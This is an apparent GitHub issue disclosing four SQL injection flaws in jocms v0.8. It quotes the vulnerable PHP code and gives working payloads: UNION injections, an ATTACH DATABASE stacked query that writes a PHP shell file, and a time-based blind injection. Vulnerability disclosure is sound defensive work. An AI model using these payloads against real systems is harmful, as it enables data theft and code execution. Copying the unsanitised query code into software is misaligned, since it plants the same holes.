Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

jocms v0.8 has some SQL Injection vulnerability #6

Closed
ghost opened this issue Jun 23, 2021 · 0 comments · Fixed by #11
Closed

jocms v0.8 has some SQL Injection vulnerability #6

ghost opened this issue Jun 23, 2021 · 0 comments · Fixed by #11

Comments

@ghost
Copy link

ghost commented Jun 23, 2021

1.SQL Injection vulnerability

In jocms/apps/mask/inc/mask.php line 18~23:

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $mask = jo_get_masks($decoded["id"])[0];

function jo_json_check() will return JSON data submitted by users:

function jo_json_check(){
  if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
      return false;
  }

  $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
  if(strpos(strtolower($contentType), 'application/json') != 0){
      return false;
  }

  $content = trim(file_get_contents("php://input"));

  $decoded = json_decode($content, true);

  if(!is_array($decoded)){
      return false;
  }
  return $decoded;
}

then jo_get_masks() will execute SQL statement.

function jo_get_masks($id){
    $condition = "";
    $masks = [];
    if($id != "all"){
        $condition = " WHERE id='".$id."' ";
    }else{
        $condition = " WHERE type='mask' ";
    }
    $code;
    $handle = jocms_db_link();
    $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
    while($output = $result->fetchArray()){
        $masks[] = $output;
    }
    return $masks;
}

There is no filtering for the input parameter,so we can use single quotation marks to close and inject.payload:

{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}

iShot2021-06-23 22 17 29

2.SQL Injection vulnerability

In jocms/apps/mask/inc/getmask.php line 16~21

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $masks = jo_get_masks($decoded["content"]);

It's similar to the one above. Just change the id to content.payload:

{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}

iShot2021-06-23 22 23 41

3.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 19~30

if(isset($_POST["saved"])){
    if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
        $code = $_POST["code"];
        $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
        $domobject = str_get_html ($code);
        $attr = "data-jo-content";
        $mask = $domobject->find("*", 0);
        $mask->$attr = "noneditable";
        $code = str_replace("--jo:r--", PHP_EOL,  $domobject->save());
        jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
    }
}

user controlled parameters will pass into the function jo_set_mask().

In jocms/core/inc/db.php line 253:

function jo_set_mask($id, $name, $type, $code){
    $handle = jocms_db_link();
    if($id != 0){
        $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
        $return = $id;
    }else{
        $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
        $return = $handle->lastInsertRowid();
    }
    return $return;
}

No filtering for parameters so we can execute any SQL statement.

we can write a php code by this:

saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx

iShot2021-06-23 22 36 08

visit:

iShot2021-06-23 22 35 52

4.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 31~33:

if(isset($_GET["deleted"]) AND isset($_GET["id"])){
    jo_delete_mask($_GET["id"]);
}

follow function jo_delete_mask():

function jo_delete_mask($id){
    $handle = jocms_db_link();
    $result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
    return $result;
}

No filtering for parameter id,so we can inject,use time based injection:

?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'

iShot2021-06-23 23 16 55

iShot2021-06-23 23 17 13

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

0 participants